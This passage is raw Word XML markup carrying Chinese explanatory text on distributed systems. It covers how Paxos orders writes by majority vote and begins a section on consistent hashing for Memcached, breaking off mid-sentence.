        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0" w:line="313" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>据说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Paxos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>算法的难理解与算法的知名度一样令人敬仰，所以我们先看如何保持数据的一致性，这里有个原则就是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC714A" w:rsidRDefault="00BC714A" w:rsidP="00BC714A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="313" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在一个分布式数据库系统中，如果各节点的初始状态一致，每个节点都执行相同的操作序列，那么他们最后能得到一个一致的状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC714A" w:rsidRDefault="00BC714A" w:rsidP="00BC714A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0" w:line="313" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>        Paxos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>算法解决的什么问题呢，解决的就是保证每个节点执行相同的操作序列。好吧，这还不简单，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>master</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>维护一个全局写队列，所有写操作都必须</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>放入这个队列编号，那么无论我们写多少个节点，只要写操作是按编号来的，就能保证一致性。没错，就是这样，可是如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>master</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>挂了呢。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A368BE" w:rsidRPr="00725370" w:rsidRDefault="00BC714A" w:rsidP="00725370">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0" w:line="313" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>        Paxos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>算法通过投票来对写操作进行全局编号，同一时刻，只有一个写操作被批准，同时并发的写操作要去争取选票，只有获得过半数选票的写操作才会被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>批准（所以永远只会有一个写操作得到批准），其他的写操作竞争失败只好再发起一轮投票，就这样，在日复一日年复一年的投票中，所有写操作都被严格编号排</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>序。编号严格递增，当一个节点接受了一个编号为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的写操作，之后又接受到编号为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>99</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的写操作（因为网络延迟等很多不可预见原因），它马上能意识到自己</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>数据不一致了，自动停止对外服务并重启同步过程。任何一个节点挂掉都不会影响整个集群的数据一致性（总</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2n+1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>台，除非挂掉大于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>台）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A368BE" w:rsidRPr="00F41A4C" w:rsidRDefault="002B77AB" w:rsidP="00A368BE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00A368BE" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">.2.2 </w:t>
      </w:r>
      <w:r w:rsidR="00A368BE" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>一致性</w:t>
      </w:r>
      <w:r w:rsidR="00A368BE" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Hash</w:t>
      </w:r>
      <w:r w:rsidR="00A368BE" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>算法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1D34" w:rsidRPr="00F41A4C" w:rsidRDefault="002D1D34" w:rsidP="002D1D34">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一致性哈希算法</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA49EE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Consistent Hashing Algorithm</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是一种分布式算法，常用于负载均衡。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Memcached client</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>也选择这种算法，解决将</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>key-value</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>均匀分配到众多</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Memcached server</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>上的问题。它可以取代传统的取模操作，解决了取模操作无法应对增删</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Memcached Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的问题</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>增删</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>会导致同一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>key,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>操作时分配不到数据真正存储的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，命中率会急剧下降</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1D34" w:rsidRPr="00F41A4C" w:rsidRDefault="002D1D34" w:rsidP="002D1D34">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>下面以</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Memcached</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的分布式问题为讨论点，但将</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Memcached server</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>抽象为节点</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(Node)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>］</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>引文中描述的一致性</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>算法有个潜在的问题是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将节点</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>后会不均匀地分布在环上，这样大量</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在寻找节点时，会存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
